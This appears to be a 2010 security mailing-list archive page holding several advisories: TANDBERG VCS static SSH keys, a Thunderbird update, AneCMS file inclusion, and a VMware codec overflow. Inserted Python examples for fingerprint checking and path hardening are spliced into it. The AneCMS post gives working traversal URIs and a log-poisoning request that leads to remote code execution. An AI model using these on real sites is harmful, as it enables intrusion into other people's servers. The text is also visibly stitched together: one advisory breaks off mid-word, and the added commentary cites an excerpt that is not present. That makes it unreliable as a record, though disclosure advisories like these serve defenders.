appear to be vulnerable.  Earlier versions have not been tested.


Vendor Response
- ---
The following timeline details TANDBERG's response to the reported issue:

2009-12-09Preliminary notice to TANDBERG. TANDBERG responded immediately.

2009-12-22VSR provided TANDBERG a draft advisory.

2009-12-28TANDBERG provided VSR with a beta version of the x5.0 firmware,
  but this did not appear to correct the issue.

2010-01-22TANDBERG provided VSR with a beta version of the x5.1 firmware,
  but this did not appear to correct the issue for existing 
  installations, since old vulnerable keys would be preserved.

2010-01-28TANDBERG explained that changing SSH keys automatically on
  administrators may cause backward compatibility problems.  
  Therefore, TANDBERG decided to preserve old keys even when
  upgrading a system which contains a vulnerable key.  
  Administrators will instead be warned in the web console that a
  vulnerable key is in use and will be expected to update host keys
  manually.

2010-03-26TANDBERG provided VSR with a release candidate firmware for 
  version x5.1.1.

2010-04-07TANDBERG VCS firmware version x5.1.1 released [2].

2010-04-09VSR advisory released.



Recommendation
- --
Immediately replace the current SSH host key with a new one.  This may
be accomplished through one of several methods.  One approach is to
simply log in to the device locally and use the ssh-keygen utility to
replace the keys stored in /tandberg/sshkeys/.  Consult TANDBERG
documentation for other methods.

After replacing the SSH host keys, it is recommended that the VCS
firmware be upgraded to X5.1.1 as soon as possible.  NOTE: Upgrading or
downgrading to versions prior to X5.1.1 will cause any custom SSH host
keys to be overwritten. Version X5.1.1 and later should preserve any
custom host keys previously installed.  As a precaution, after upgrading
or downgrading VCS f
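The advisory's recommendation comes down to two checks an administrator can script: is the host key an appliance presents one of the known shipped keys, and is the same host key showing up on more than one device. As an added example, not part of the VSR advisory or of TANDBERG's software, the Python below computes the colon-separated MD5 fingerprint that `ssh-keygen -l` printed at the time (the format the advisory quotes) and the SHA-256 form newer OpenSSH prints, flags a public key whose fingerprint is on a list of known static keys, and scans a known_hosts file for one key reused across several hosts, which is how a fleet sharing a baked-in key shows up before anyone publishes its fingerprint. The ssh-dss key, its integer parameters and the known_hosts entries are constructed for the example and are not real keys; only the advisory's fingerprint is taken from the text above.

```python
import base64
import hashlib
import struct
from collections import defaultdict

# MD5 fingerprint quoted in the advisory for the key shipped in the VCS firmware.
STATIC_KEY_FINGERPRINTS = {"49:53:bf:94:2a:d7:0c:3f:48:29:f7:5b:5d:de:89:b8"}


def _ssh_string(raw: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(raw)) + raw


def _ssh_mpint(n: int) -> bytes:
    """SSH wire 'mpint' for a non-negative integer (a leading 0x00 keeps it positive)."""
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def make_dss_pubkey_line(p: int, q: int, g: int, y: int, comment: str) -> str:
    """Build an OpenSSH 'ssh-dss <base64 blob> <comment>' line from DSA values."""
    blob = _ssh_string(b"ssh-dss") + b"".join(_ssh_mpint(v) for v in (p, q, g, y))
    return f"ssh-dss {base64.b64encode(blob).decode('ascii')} {comment}"


# Constructed key: the integers are small placeholders, not real DSA parameters,
# so its fingerprint is arbitrary and deliberately not the advisory's.
SAMPLE_KEY_LINE = make_dss_pubkey_line(
    p=0xD4A35E1F9B2C7A11, q=0x9F3B62D1, g=0x2BA1, y=0x7C5E01AA33F98D02,
    comment="constructed-vcs-key",
)

# Constructed known_hosts excerpt: three hosts, two of them presenting the same key.
SAMPLE_KNOWN_HOSTS = "\n".join([
    "vcs-1.example.com " + SAMPLE_KEY_LINE,
    "vcs-2.example.com " + SAMPLE_KEY_LINE,
    "bastion.example.com " + make_dss_pubkey_line(0xBEEFCAFE1234, 0x1F3D, 0x5, 0x770000000001, "other"),
    "# comment lines and blank lines are ignored",
    "",
])


def parse_pubkey(ktype: str, b64: str) -> bytes:
    """Decode a public key blob and check the embedded type matches the text field."""
    blob = base64.b64decode(b64, validate=True)
    if len(blob) < 4:
        raise ValueError("blob too short")
    (tlen,) = struct.unpack(">I", blob[:4])
    if blob[4:4 + tlen] != ktype.encode("ascii"):
        raise ValueError("key type in blob does not match declared type")
    return blob


def md5_fingerprint(blob: bytes) -> str:
    """Colon-separated MD5 of the blob, the format `ssh-keygen -l` printed in 2010."""
    return ":".join(f"{b:02x}" for b in hashlib.md5(blob).digest())


def sha256_fingerprint(blob: bytes) -> str:
    """Unpadded base64 SHA-256 of the blob, the format newer OpenSSH prints."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def is_known_static_key(pubkey_line: str, static=STATIC_KEY_FINGERPRINTS) -> bool:
    """True if a 'keytype base64 [comment]' line carries a listed static key."""
    ktype, b64 = pubkey_line.split()[:2]
    return md5_fingerprint(parse_pubkey(ktype, b64)) in static


def shared_host_keys(known_hosts_text: str) -> dict:
    """Map each fingerprint seen on more than one host to the hosts using it.

    A host key repeated across unrelated hosts is the signature of firmware
    shipping a baked-in key, whether or not its fingerprint is on a list yet.
    """
    hosts_by_fp = defaultdict(list)
    for line in known_hosts_text.splitlines():
        parts = line.split()
        if len(parts) < 3 or line.startswith("#"):
            continue
        hosts, ktype, b64 = parts[0], parts[1], parts[2]
        try:
            fp = md5_fingerprint(parse_pubkey(ktype, b64))
        except (ValueError, struct.error):
            continue  # entries whose key does not decode are skipped, not trusted
        hosts_by_fp[fp].extend(hosts.split(","))
    return {fp: h for fp, h in hosts_by_fp.items() if len(h) > 1}
```

Both fingerprints are computed over the decoded key blob, which is what OpenSSH hashes, so the same functions work on a line from `ssh-keyscan`, from a device's `ssh_host_dsa_key.pub`, or from a known_hosts entry after its host field is stripped.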

[USN-927-3] Thunderbird regression

2010-04-12 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-927-3 April 11, 2010
thunderbird regression
https://launchpad.net/bugs/559918
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.10:
  thunderbird 2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2

After a standard system upgrade you need to restart Thunderbird to effect
the necessary changes.

Details follow:

USN-927-1 fixed vulnerabilities in NSS. Due to upstream changes in NSS
3.12.6, Thunderbird would be unable to initialize the security component
and connect with SSL/TLS if the old libnss3-0d transition package was
installed. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3
 protocols. If an attacker could perform a man in the middle attack at the
 start of a TLS connection, the attacker could inject arbitrary content at
 the beginning of the user's session. This update adds support for the new
 renegotiation extension and will use it when the server supports it.


Updated packages for Ubuntu 9.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2.diff.gz
  Size/MD5:   134402 4f55d904c22d00c1423fcdf778237df3

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2.dsc
  Size/MD5: 2362 5fbf0ab8c09988462ffad652d5724ec1

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly.orig.tar.gz
  Size/MD5: 36467375 a952c9895cc90b89f160c4b3694de834

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/mozilla-thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_all.deb
  Size/MD5:62220 92dafa6f0a04d064a0c96199ce9faef6

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/mozilla-thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_all.deb
  Size/MD5:62208 0e785915e1142f3bb25573651cd2a76b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_amd64.deb
  Size/MD5:  3738538 5d00b51452f0a5ada7aa859d4e073536

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_amd64.deb
  Size/MD5:62562 5f4e424d427833b1490f28ec3a5073e5

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_amd64.deb
  Size/MD5: 12558830 ea6aea8f8aea5a22927a33fa3d49e69a

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_i386.deb
  Size/MD5:  3722604 00383caa32265845d431ba1c41370e51

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-gnome-support_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_i386.deb
  Size/MD5:62562 72a659110cc3ce2a8321c0a2f9475de6

http://security.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_i386.deb
  Size/MD5: 11177860 de57f8a625ed43983853b3f1f1bbf567

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_lpia.deb
  Size/MD5:  3720600 dd62f203c661fdf8da663f6c5d53445e

http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-gnome-support_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_lpia.deb
  Size/MD5:62564 79e32137bc4bc26ab33b3fd9c8db6067

http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_lpia.deb
  Size/MD5: 11025166 649235af94da5615278de12fd8ea4005

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_powerpc.deb
  Size/MD5:  3729730 a90d7dd672e198674a46a4c0f9e9dba1

http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-gnome-support_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_powerpc.deb
  Size/MD5:62562 6137b40f8bf9012911479830602ef04d

http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird_2.0.0.24+build1+nobinonly-0ubuntu0.9.10.2_powerpc.deb
  Size/MD5: 12297146 45dae3dadc5ab90e41dc8e61ca30f67b

  sparc architecture (Sun SPARC/UltraSPARC):


http://ports.ubuntu.com/pool/main/t/thunderbird/thunderbird-dev_2.0.0.24+build1+nobinonly-0ubuntu0.9.

AneCMS Multiple Vulnerabilities

2010-04-12 Thread admin

##www.BugReport.ir
#
#AmnPardaz Security Research Team
#
# Title:AneCMS Multiple Vulnerabilities
# Vendor:   http://anecms.com/
# Vulnerable Version:   1.0 (Latest version till now)
# Exploitation: Remote with a RAW HTTP packet sender
# Fix:  N/A
###


- Description:


AneCMS is a small and fast, completely modular CMS. It is written in PHP with
JS (jQuery), is multilanguage and skinnable, and has an online repository of
modules accessible from the ACP of the CMS. It uses MySQL as the backend DBMS.




- Vulnerability:


+--> Local File Inclusion (LFI)
	AneCMS tries to locate local files to respond to users according to GET
	parameters. There are 25 affected files, but almost all of them are
	protected except for the 'index.php' and 'rss.php' files. Check the
	exploits section for the details.

+--> Remote Code Execution
	With a RAW HTTP packet sender, you can send unescaped PHP code to AneCMS.
	Then this code can be executed using the LFI vulnerability. Check the
	exploits section for the details.


- Exploits/PoCs:


+--> Exploiting The Local File Inclusion (LFI)
	For 'rss.php', you can select a local file path relative to the 'modules'
	directory using the 'module' GET parameter. For example, the following URI
	can be used for inspecting the '.htaccess' file:

http://target.com/rss.php?module=../.htaccess%00

	For 'index.php', you can select a local file path relative to the
	'system/ajax' directory using the 'ajax' GET parameter. For example, the
	following URI can be used for inspecting the '.htaccess' file:

http://target.com/index.php?ajax=../../.htaccess%00

+--> Remote Code Execution
	This attack should be done in two phases. First use the LFI to inject the
	desired PHP code into the web server log file. Then use the LFI again to
	execute it.
	For example, if you want to run the '' code, first send the following HTTP
	packet:

GET /rss.php?module=../%00 HTTP/1.0
Host: target.com
User-Agent: UA

	This packet will inject the '' into the error logs. Then visit the
	following URI:

http://target.com/rss.php?module=../the/path/to/logs/folder/logs/php_error.log%00

	The above URI will include the error log (including your injected code)
	and execute it.



- Solution:


Instead of generating the inclusion path from GET parameters directly, check
the value of the parameter and then include the valid hard-coded file path.


- Original Advisory:


http://www.bugreport.ir/index_71.htm


- Credit:

AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
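The TANDBERG helppage.php excerpt earlier on this page and the AneCMS rss.php/index.php cases above are the same bug: a prefix directory and a suffix are glued around an untrusted parameter, "../" walks out of the prefix, and a trailing %00 strips the suffix because PHP file functions of that era handed the path to a C API that stopped at the first NUL. As an added example serving both advisories (not code from either vendor or either researcher), the Python below models the vulnerable path construction and the NUL truncation, then shows two fixes: a hardened resolver that allows only a bare name and re-checks containment after normalisation, and the lookup-table approach the AneCMS solution recommends, where the parameter never becomes part of a path at all. The directories, suffixes and module names are assumptions for the example; the advisories do not state them.

```python
import posixpath
import re

# Assumed locations; the advisories only say a directory is prepended and a
# suffix appended (TANDBERG) or that paths are relative to 'modules' and
# 'system/ajax' (AneCMS).
HELP_DIR = "/var/www/help/"
HELP_SUFFIX = ".html"
MODULES_DIR = "/var/www/modules/"
MODULE_SUFFIX = ".php"


def php_path_before_5_3_4(path: str) -> str:
    """Model the PHP behaviour both advisories rely on: file functions handed
    the path to a C API, so everything after the first NUL byte was dropped.
    (PHP 5.3.4 started rejecting paths that contain a NUL.)"""
    return path.split("\x00", 1)[0]


def vulnerable_resolve(param: str, base: str = HELP_DIR, suffix: str = HELP_SUFFIX) -> str:
    """Mirror `$this->helpPagePath . $_GET['page'] . $this->helpPageSuffix`:
    untrusted input is glued between a prefix and a suffix with no check."""
    return posixpath.normpath(php_path_before_5_3_4(base + param + suffix))


NAME_ALLOWED = re.compile(r"[A-Za-z0-9_-]{1,64}")


def hardened_resolve(param: str, base: str = HELP_DIR, suffix: str = HELP_SUFFIX) -> str:
    """Same contract, but the parameter must be a bare name and the result must
    still lie inside `base` after normalisation."""
    if "\x00" in param:
        raise ValueError("NUL byte in parameter")
    if not NAME_ALLOWED.fullmatch(param):
        raise ValueError("parameter is not a bare file name")
    resolved = posixpath.normpath(base + param + suffix)
    root = posixpath.normpath(base)
    if not resolved.startswith(root + "/"):
        raise ValueError("resolved path escapes the base directory")
    return resolved


# The AneCMS advisory's own recommendation: do not build the path from the
# parameter at all; look the parameter up and include a hard-coded path.
# Module names and paths are assumed for the example.
MODULE_FILES = {
    "news": MODULES_DIR + "news/rss.php",
    "blog": MODULES_DIR + "blog/rss.php",
}


def lookup_resolve(module: str, table: dict = MODULE_FILES) -> str:
    """Return the hard-coded path for a known module name, or refuse."""
    try:
        return table[module]
    except KeyError:
        raise ValueError(f"unknown module {module!r}") from None


def is_rejected(resolver, param: str, **kw) -> bool:
    """True when the resolver refuses the parameter."""
    try:
        resolver(param, **kw)
    except ValueError:
        return True
    return False
```

The containment check in hardened_resolve is redundant with the allow-list on purpose: if the allow-list is ever loosened (to permit subdirectories, say), the normalised-path comparison still blocks traversal, and the explicit NUL check keeps the behaviour independent of which PHP or runtime version eventually executes the real code.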




HITBSecConf DUBAI 2010: Learn more about web attacks and stealth hacking

2010-04-12 Thread Laurent OUDOT at TEHTRI-Security
Hi Folks,

If you are interested in web attacks and stealth hacking, come and join
us at HITBSecConf Dubai [
http://conference.hackinthebox.org/hitbsecconf2010dxb/?page_id=680 ].

On 21st April, TEHTRI-Security will talk about web security during
this presentation: "Silent Steps: Improving the Stealthiness of Web
Hacking".

This will include in particular:
 - Bunches of 0-days against widely deployed web applications
 - A new technical method for web attackers to improve their
stealthiness during an intrusion
 - A global analysis of fingerprints left by attackers during each step
of a web attack (backdoors, bounces...) and how to detect them

See you soon at HITBSecConf Dubai...

Laurent OUDOT, founder & CEO of TEHTRI-Security, "/This is not a game./"
 http://www.tehtri-security.com



VUPEN Security Research - VMware Products Movie Decoder Heap Overflow Vulnerability

2010-04-12 Thread VUPEN Security Research
VUPEN Security Research - VMware Products Movie Decoder Heap Overflow 
Vulnerability


http://www.vupen.com/english/research.php


I. BACKGROUND
-

"VMware is a provider of virtualization software which runs on
Microsoft Windows, Linux, and Mac OS X. VMware's enterprise
software, VMware ESX Server, runs directly on server hardware
without requiring an additional underlying operating system".
from wikipedia


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered a vulnerability in
VMware products.

The flaw is caused by a heap overflow error in the VMnc media codec
when processing malformed AVI files, which could be exploited by
attackers to potentially execute arbitrary code by tricking a user
into opening a malicious movie file.


III. AFFECTED PRODUCTS
---

VMware Workstation versions prior to 6.5.4 build 246459
VMware Player versions prior to 2.5.4 build 246459
VMware Server versions 2.x
VMware Movie Decoder versions prior to 6.5.4 Build 246459



IV. BINARY ANALYSIS & PROOF-OF-CONCEPT
---

In-depth binary analysis of the vulnerability and a PoC
have been released by VUPEN through the VUPEN Binary Analysis
& Exploits Service :

http://www.vupen.com/exploits/


V. SOLUTION


Upgrade to VMware Workstation version 6.5.4 build 246459:
http://downloads.vmware.com/download/download.do?downloadGroup=WKST-654-WIN

Upgrade to VMware Player version 2.5.4 build 246459 :
http://downloads.vmware.com/download/player/player_reg.html

Upgrade to VMware Movie Decoder version 6.5.4 Build 246459 :
http://download3.vmware.com/software/wkst/VMware-moviedecoder-6.5.4-246459.exe


VI. CREDIT
--

The vulnerability was discovered by Sebastien Renaud of VUPEN Security


VII. ABOUT VUPEN Security
---

VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.

Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.

* VUPEN Vulnerability Notification Service:

http://www.vupen.com/english/services/

* VUPEN Binary Analysis & Exploits Service :

http://www.vupen.com/exploits/


VIII. REFERENCES
--

http://www.vupen.com/english/advisories/2010/0852
http://lists.vmware.com/pipermail/security-announce/2010/90.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1564


IX. DISCLOSURE TIMELINE
--- 


2009-09-14 - Vendor notified
2009-09-14 - Vendor response
2009-10-09 - Status update received
2009-10-27 - Status update received
2010-01-29 - Status update received
2010-03-05 - Status update received
2010-03-31 - Status update received
2010-04-09 - Coordinated public Disclosure